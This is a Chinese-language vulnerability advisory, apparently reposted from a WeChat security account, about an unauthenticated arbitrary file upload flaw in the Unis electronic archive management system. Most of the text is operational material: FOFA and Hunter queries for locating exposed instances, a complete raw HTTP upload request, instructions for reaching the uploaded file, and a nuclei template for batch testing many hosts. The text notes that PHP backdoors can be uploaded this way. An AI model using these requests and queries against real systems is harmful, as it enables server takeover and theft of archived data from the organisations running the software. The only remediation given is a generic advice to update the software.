免责声明
文章所涉及内容,仅供安全研究与教学之用,由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
产品简介
紫光电子档案管理系统是清华紫光在多年档案项目产品研发的基础上,于2015年推出的新一代互联网架构的电子档案系统。遵循国家档案管理标准,结合先进的信息化管理理念,使用领先的互联网云计算(J2EE+PHP)的技术框架,和采用流行的网络UE设计优化用户体验,可为企业快速构建高质量的先进性、安全性、前瞻性的综合档案管理平台。
漏洞描述
紫光电子档案管理系统上传接口/System/Cms/upload.html存在未授权访问,导致任意文件上传漏洞,恶意攻击者可以直接上传恶意PHP后门文件,恶意PHP代码能够解析执行造成主机权限丢失,严重威胁系统以及数据相关安全。
网络测绘
favicon图标特征
FOFA网络测绘搜索
app="紫光档案管理系统"
鹰图网络测绘搜索
app.name="紫光档案管理系统"
漏洞复现
访问URL地址,界面如下
发送请求包上传文件,根据响应包得到文件保存路径
POST /System/Cms/upload.html?token= HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 554
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3enKbCUwg60aGZcr
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="userID"
admin
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="fondsid"
1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="comid"
1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="token"
1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="files[]"; filename="test.txt"
file-upload-test
------WebKitFormBoundary3enKbCUwg60aGZcr--
根据响应包拼接路径,即可访问上传的文件,例如:
http://127.0.0.1:80/uploads/company1/fonds1/cms/20230919/UNIS-4eNGCaBibaHch8O8Yrc9e6nOB.txt
nuclei批量验证POC模板
id: ziguang_danganmanage_system_uploads_file
info:
name: ziguang_danganmanage_system_uploads_file
author: 4Zen
severity: high
tags: rce,fileupload,intrusive
metadata:
max-request: 1
http:
- raw:
- |
POST /System/Cms/upload.html?token= HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 554
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3enKbCUwg60aGZcr
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="userID"
admin
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="fondsid"
1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="comid"
1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="token"
1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="files[]"; filename="test.txt"
file-upload-test
------WebKitFormBoundary3enKbCUwg60aGZcr--
matchers-condition: and
matchers:
- type: word
words:
- "test.txt"
- "cms"
- "uploads"
- "fonds1"
- "company1"
- type: status
status:
- 200
修复方案
及时更新到最新版本或根据情况联系供应商获取最佳修复方案。
原文始发于微信公众号(划水但不摆烂):【漏洞情报 | 新】紫光档案系统任意文件上传
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论